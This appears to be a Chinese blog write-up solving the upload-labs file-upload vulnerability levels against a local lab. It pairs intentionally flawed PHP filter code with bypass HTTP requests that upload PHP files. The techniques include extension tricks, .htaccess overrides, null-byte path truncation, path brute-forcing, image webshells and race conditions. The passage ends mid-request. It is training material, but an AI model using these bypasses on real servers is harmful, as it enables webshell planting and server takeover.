

follow my dream

upload-labs

follow my dream

upload-labs

labs

字数统计: 6.6k阅读时长: 36 min

 2020/04/29   Share

• 
• 
• 
• 
• 

使用环境

环境的下载与搭建

https://github.com/c0ny1/upload-labs

推荐使用docker配环境太烦了

知识点与参考

项目作者画的图

推荐阅读:

https://blog.csdn.net/wn314/article/details/77074477

https://blog.csdn.net/wn314/article/details/77388337

https://blog.csdn.net/wn314/article/details/77388289

upload-labs

0x01

客户端检验

function checkFile() {
    var file = document.getElementsByName('upload_file')[0].value;
    if (file == null || file == "") {
        alert("请选择要上传的文件!");
        return false;
    }
    //定义允许上传的文件类型
    var allow_ext = ".jpg|.png|.gif";
    //提取上传文件的类型
    var ext_name = file.substring(file.lastIndexOf("."));
    //判断上传文件类型是否允许上传
    if (allow_ext.indexOf(ext_name + "|") == -1) {
        var errMsg = "该文件不允许上传，请上传" + allow_ext + "类型的文件,当前文件类型为：" + ext_name;
        alert(errMsg);
        return false;
    }
}

方法:

先上传符合条件的文件，再bp抓包，修改后缀名，需注意可能要修改请求头中的Content-Length.

POST /Pass-01/index.php HTTP/1.1
Host: 192.168.21.135:8123
Content-Length: 311
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.21.135:8123
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZEvupLzlFsGWVTE2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4115.0 Safari/537.36 Edg/84.0.488.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.21.135:8123/Pass-01/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

------WebKitFormBoundaryZEvupLzlFsGWVTE2
Content-Disposition: form-data; name="upload_file"; filename="phpinfo.php"
Content-Type: image/jpeg

<?php phpinfo();?>

------WebKitFormBoundaryZEvupLzlFsGWVTE2
Content-Disposition: form-data; name="submit"

上传
------WebKitFormBoundaryZEvupLzlFsGWVTE2--

访问http://192.168.21.135:8123/upload/phpinfo.php

0x02

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name']            
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错！';
            }
        } else {
            $msg = '文件类型不正确，请重新上传！';
        }
    } else {
        $msg = UPLOAD_PATH.'文件夹不存在,请手工创建！';
    }
}

payload :

还是第一题http请求,只要MIME符合image/png image/jpg image/gif

0x03

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array('.asp','.aspx','.php','.jsp');
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //收尾去空

        if(!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;            
            if (move_uploaded_file($temp_file,$img_path)) {
                 $is_upload = true;
            } else {
                $msg = '上传出错！';
            }
        } else {
            $msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件！';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';
    }
}

需要注意的是 php.ini

# <FilesMatch \.php$>
#       SetHandler application/x-httpd-php
# </FilesMatch>

AddHandler application/x-httpd-php .php .php3 .phtml

DirectoryIndex disabled
DirectoryIndex index.php index.html

<Directory /var/www/>
        Options -Indexes
        AllowOverride All
</Directory>

所以此题可以上传.php3 .phtml文件，并可执行

还有一个问题

$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext; 

这就需要爆破路径了。配合bp 的爆破模板

data时间有问题emmm需要修改

date_default_timezone_set("Asia/Shanghai");

import requests

url_header="http://192.168.21.135:8123/upload/20200428150054{0}.php3"
for i in range(1000,10000):
    url = url_header.format(i)
    resp = requests.get(url)
    if "phpinfo" not in resp.content:
        continue
    else:
        print(url)
        break

http://192.168.21.135:8123/upload/202004281500541171.php3
[Finished in 0.8s]

0x04

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //收尾去空

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错！';
            }
        } else {
            $msg = '此文件不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';
    }
}

当前配置

# <FilesMatch \.php$>
#       SetHandler application/x-httpd-php
# </FilesMatch>

方法1

利用apache2对未知扩展名的特性，从右到左开始解析扩展名，如果无法识别，接着往左识别，知道可以识别。

------WebKitFormBoundaryZEvupLzlFsGWVTE2
Content-Disposition: form-data; name="upload_file"; filename="phpinfo.php.a"
Content-Type: image/jpeg

<?php phpinfo();?>

------WebKitFormBoundaryZEvupLzlFsGWVTE2
Content-Disposition: form-data; name="submit"

涓婁紶
------WebKitFormBoundaryZEvupLzlFsGWVTE2--

方法2

此题并没有禁止上传.htaccess文件,所以可以利用.htaccess来修改upload 文件夹下的配置。

.htaccess文件

SetHandler application/x-httpd-php

这时，apache2会解析文件为php文件

------WebKitFormBoundaryZEvupLzlFsGWVTE2
Content-Disposition: form-data; name="upload_file"; filename="phpinfo.jpg"
Content-Type: image/jpeg

<?php phpinfo();?>

------WebKitFormBoundaryZEvupLzlFsGWVTE2
Content-Disposition: form-data; name="submit"

涓婁紶
------WebKitFormBoundaryZEvupLzlFsGWVTE2--

0x05

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错！';
            }
        } else {
            $msg = '此文件类型不允许上传！';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';
    }
}

这题使用第四题的第一种方法，不再赘述。

0x06

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错！';
            }
        } else {
            $msg = '此文件类型不允许上传！';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';
    }
}

注意文件名的拼接方式为UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;

而不是UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_name

同时在过滤部分少了一个$file_ext = strtolower($file_ext); //转换为小写

所以可以上传后缀名为.PHP的文件

在结合第三题的爆破目录的方法。

result

http://192.168.21.135:8123/upload/202004281019342703.PHP
[Finished in 5.9s]

0x07

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_name = $_FILES['upload_file']['name'];
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file,$img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错！';
            }
        } else {
            $msg = '此文件不允许上传';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';
    }
}

缺少空格检测，所以可以在文件名后添加一个空格，就可以上传，但问题是无法解析为php文件

在windows环境下倒是可以利用忽视后缀名空格的特性来执行，修改后缀名为.php 注意还是有空格

0x08

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错！';
            }
        } else {
            $msg = '此文件类型不允许上传！';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';
    }
}

没有过滤.可以用1.php.来绕过，也可以被解析

Linux和Windows都可以

0x09

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = trim($file_ext); //首尾去空
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错！';
            }
        } else {
            $msg = '此文件类型不允许上传！';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';
    }
}

去除字符串::$DATA

在Windows: http请求头

-----------------------------117554319939046175791880698296
Content-Disposition: form-data; name="upload_file"; filename="2.php::$DATA"
Content-Type: application/octet-stream

<?php
phpinfo();
?>
-----------------------------117554319939046175791880698296
Content-Disposition: form-data; name="submit"

上传
-----------------------------117554319939046175791880698296--

0x10

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错！';
            }
        } else {
            $msg = '此文件类型不允许上传！';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';
    }
}

跟前面一样

filename="1.php.aaaa"

0x11

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess","ini");

        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = str_ireplace($deny_ext,"", $file_name);
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = UPLOAD_PATH.'/'.$file_name;        
        if (move_uploaded_file($temp_file, $img_path)) {
            $is_upload = true;
        } else {
            $msg = '上传出错！';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';
    }
}

str_ireplace() 函数替换字符串中的一些字符（不区分大小写）。

可以改为filename="2.PphpHP"来绕过

0x12

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = '上传出错！';
        }
    } else{
        $msg = "只允许上传.jpg|.png|.gif类型文件！";
    }
}

strrpos() 函数查找字符串在另一字符串中最后一次出现的位置。

注释：strrpos() 函数对大小写敏感。

substr() 函数返回字符串的一部分。

利用save_path和字符截取

POST /useful/upload-labs/Pass-12/index.php?save_path=../upload/1.php%00 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------21418754013159453003836065548
Content-Length: 380
Origin: http://localhost
Connection: close
Referer: http://localhost/useful/upload-labs/Pass-12/index.php
Cookie: PHPSESSID=cf8866b68661c1bc05d55b19c383afae
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1

-----------------------------21418754013159453003836065548
Content-Disposition: form-data; name="upload_file"; filename="phpinfo.jpg"
Content-Type: application/octet-stream

<?php
phpinfo();
?>
-----------------------------21418754013159453003836065548
Content-Disposition: form-data; name="submit"

上传
-----------------------------21418754013159453003836065548--

0x13

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上传失败";
        }
    } else {
        $msg = "只允许上传.jpg|.png|.gif类型文件！";
    }
}

先在后面添加一个空格，再在二进制改

0x14

hint：

上传图片马到服务器。

注意：

1.保证上传后的图片马中仍然包含完整的一句话或webshell代码。

2.使用文件包含漏洞能运行图片马中的恶意代码。

3.图片马要.jpg,.png,.gif三种后缀都上传成功才算过关！

function getReailFileType($filename){
    $file = fopen($filename, "rb");
    $bin = fread($file, 2); //只读2字节
    fclose($file);
    $strInfo = @unpack("C2chars", $bin);  //unpack() 函数从二进制字符串对数据进行解包。   
    $typeCode = intval($strInfo['chars1'].$strInfo['chars2']);    //intval() 函数用于获取变量的整数值。 
    $fileType = '';    
    switch($typeCode){      
        case 255216:            
            $fileType = 'jpg';
            break;
        case 13780:            
            $fileType = 'png';
            break;        
        case 7173:            
            $fileType = 'gif';
            break;
        default:            
            $fileType = 'unknown';
        }    
        return $fileType;
}

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_type = getReailFileType($temp_file);

    if($file_type == 'unknown'){
        $msg = "文件未知，上传失败！";
    }else{
        $img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$file_type;
        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上传出错！";
        }
    }
}

include.php

<?php
/*
本页面存在文件包含漏洞，用于测试图片马是否能正常运行！
*/
header("Content-Type:text/html;charset=utf-8");
$file = $_GET['file'];
if(isset($file)){
    include $file;
}else{
    show_source(__file__);
}
?>

考点是生产图片马

cmd 命令

copy 1.jpg/b+1.php/a 3.jpg

同样需要bp+python 来爆破目录

wehshell_gif.gif

wehshell_jpg.jpg

wehshell_png.png

0x15

与上一题相仿，可以采用相同的方法

function isImage($filename){
    $types = '.jpeg|.png|.gif';
    if(file_exists($filename)){
        $info = getimagesize($filename);
        $ext = image_type_to_extension($info[2]);
        if(stripos($types,$ext)>=0){
            return $ext;
        }else{
            return false;
        }
    }else{
        return false;
    }
}

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $res = isImage($temp_file);
    if(!$res){
        $msg = "文件未知，上传失败！";
    }else{
        $img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").$res;
        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上传出错！";
        }
    }
}

0x16

14的payload

function isImage($filename){
    //需要开启php_exif模块
    $image_type = exif_imagetype($filename);
    switch ($image_type) {
        case IMAGETYPE_GIF:
            return "gif";
            break;
        case IMAGETYPE_JPEG:
            return "jpg";
            break;
        case IMAGETYPE_PNG:
            return "png";
            break;    
        default:
            return false;
            break;
    }
}

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $res = isImage($temp_file);
    if(!$res){
        $msg = "文件未知，上传失败！";
    }else{
        $img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$res;
        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上传出错！";
        }
    }
}

0x17 二次渲染

直接用图片马不行

if (isset($_POST['submit'])){
    // 获得上传文件的基本信息，文件名，类型，大小，临时文件路径
    $filename = $_FILES['upload_file']['name'];
    $filetype = $_FILES['upload_file']['type'];
    $tmpname = $_FILES['upload_file']['tmp_name'];

    $target_path=UPLOAD_PATH.'/'.basename($filename);

    // 获得上传文件的扩展名
    $fileext= substr(strrchr($filename,"."),1);

    //判断文件后缀与类型，合法才进行上传操作
    if(($fileext == "jpg") && ($filetype=="image/jpeg")){
        if(move_uploaded_file($tmpname,$target_path)){
            //使用上传的图片生成新的图片
            $im = imagecreatefromjpeg($target_path);

            if($im == false){
                $msg = "该文件不是jpg格式的图片！";
                @unlink($target_path);
            }else{
                //给新图片指定文件名
                srand(time());
                $newfilename = strval(rand()).".jpg";
                //显示二次渲染后的图片（使用用户上传图片生成的新图片）
                $img_path = UPLOAD_PATH.'/'.$newfilename;
                imagejpeg($im,$img_path);
                @unlink($target_path);
                $is_upload = true;
            }
        } else {
            $msg = "上传出错！";
        }

payload:

POST /Pass-17/index.php?action=show_code HTTP/1.1
Host: 192.168.21.135:8123
Content-Length: 311
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.21.135:8123
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary627hH4npNd2uQa4B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4115.0 Safari/537.36 Edg/84.0.488.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.21.135:8123/Pass-17/index.php?action=show_code
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

------WebKitFormBoundary627hH4npNd2uQa4B
Content-Disposition: form-data; name="upload_file"; filename="phpinfo.jpg"
Content-Type: image/jpeg

<?php phpinfo();?>

------WebKitFormBoundary627hH4npNd2uQa4B
Content-Disposition: form-data; name="submit"

上传
------WebKitFormBoundary627hH4npNd2uQa4B--

0x18

$is_upload = false;
$msg = null;

if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_name = $_FILES['upload_file']['name'];
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_ext = substr($file_name,strrpos($file_name,".")+1);
    $upload_file = UPLOAD_PATH . '/' . $file_name;

    if(move_uploaded_file($temp_file, $upload_file)){
        if(in_array($file_ext,$ext_arr)){
             $img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
             rename($upload_file, $img_path);
             $is_upload = true;
        }else{
            $msg = "只允许上传.jpg|.png|.gif类型文件！";
            unlink($upload_file);
        }
    }else{
        $msg = '上传出错！';
    }
}

• 条件竞争

本题会先保存文件，之后判断后缀名，重命名文件。

0x19

代码审计

//index.php
$is_upload = false;
$msg = null;
if (isset($_POST['submit']))
{
    require_once("./myupload.php");
    $imgFileName =time();
    $u = new MyUpload($_FILES['upload_file']['name'], $_FILES['upload_file']['tmp_name'], $_FILES['upload_file']['size'],$imgFileName);
    $status_code = $u->upload(UPLOAD_PATH);
    switch ($status_code) {
        case 1:
            $is_upload = true;
            $img_path = $u->cls_upload_dir . $u->cls_file_rename_to;  // path =  dir + name
            break;
        case 2:
            $msg = '文件已经被上传，但没有重命名。';
            break; 
        case -1:
            $msg = '这个文件不能上传到服务器的临时文件存储目录。';
            break; 
        case -2:
            $msg = '上传失败，上传目录不可写。';
            break; 
        case -3:
            $msg = '上传失败，无法上传该类型文件。';
            break; 
        case -4:
            $msg = '上传失败，上传的文件过大。';
            break; 
        case -5:
            $msg = '上传失败，服务器已经存在相同名称文件。';
            break; 
        case -6:
            $msg = '文件无法上传，文件不能复制到目标目录。';
            break;      
        default:
            $msg = '未知错误！';
            break;
    }
}

//myupload.php
class MyUpload{
......
......
...... 
  var $cls_arr_ext_accepted = array(
      ".doc", ".xls", ".txt", ".pdf", ".gif", ".jpg", ".zip", ".rar", ".7z",".ppt",
      ".html", ".xml", ".tiff", ".jpeg", ".png" );

......
......
......  
  /** upload()
   **
   ** Method to upload the file.
   ** This is the only method to call outside the class.
   ** @para String name of directory we upload to
   ** @returns void
  **/
  function upload( $dir ){
    
    $ret = $this->isUploadedFile();
    
    if( $ret != 1 ){  //这个文件不能上传到服务器的临时文件存储目录。。
      return $this->resultUpload( $ret );
    }

    $ret = $this->setDir( $dir );
    if( $ret != 1 ){//上传失败，上传目录不可写。
      return $this->resultUpload( $ret );
    }

    $ret = $this->checkExtension(); //检查后缀名
    if( $ret != 1 ){
      return $this->resultUpload( $ret );
    }

    $ret = $this->checkSize();//上传失败，无法上传该类型文件。'
    if( $ret != 1 ){
      return $this->resultUpload( $ret );    
    }
    
    // if flag to check if the file exists is set to 1
    
    if( $this->cls_file_exists == 1 ){
      
      $ret = $this->checkFileExists();
      if( $ret != 1 ){
        return $this->resultUpload( $ret );    
      }
    }

    // if we are here, we are ready to move the file to destination

    $ret = $this->move();
    if( $ret != 1 ){  //从tmp文件移到upload，否则无法访问，也就是说要前面条件都符合才行。
      return $this->resultUpload( $ret );    
    }

    // check if we need to rename the file

    if( $this->cls_rename_file == 1 ){
      $ret = $this->renameFile();
      if( $ret != 1 ){
        return $this->resultUpload( $ret );    
      }
    }
    
    // if we are here, everything worked as planned :)

    return $this->resultUpload( "SUCCESS" );
  
  }
......
......
...... 
};

思路是利用条件竞争，使rename较慢执行，同时bp访问upload1.php.rar、利用apache2的特性，生成新的文件phpinfo.php，维持联系。

记录一个坑点，试了还久，才发现前面还有一个upload前缀 ，我去，怪不得无法生产phpinfo.php, 我实属瞎子 /(ㄒoㄒ)/~~ 怀疑是没加/ 正常不应该在upload文件夹下吗？

1.php.rar

访问1.php.rar以生成phpinfo.php

0x20

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");

        $file_name = $_POST['save_name'];
        $file_ext = pathinfo($file_name,PATHINFO_EXTENSION);

        if(!in_array($file_ext,$deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' .$file_name;
            if (move_uploaded_file($temp_file, $img_path)) { 
                $is_upload = true;
            }else{
                $msg = '上传出错！';
            }
        }else{
            $msg = '禁止保存为该类型文件！';
        }

    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';
    }
}

php > print_r(pathinfo("/testweb/test.txt.php"));
Array
(
    [dirname] => /testweb
    [basename] => test.txt.php
    [extension] => php
    [filename] => test.txt
)

payload:

直接利用apache2特性

POST /Pass-20/index.php HTTP/1.1
Host: 192.168.21.135:8123
Content-Length: 428
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.21.135:8123
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7CfGfgBPFmA65LPV
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4115.0 Safari/537.36 Edg/84.0.488.1
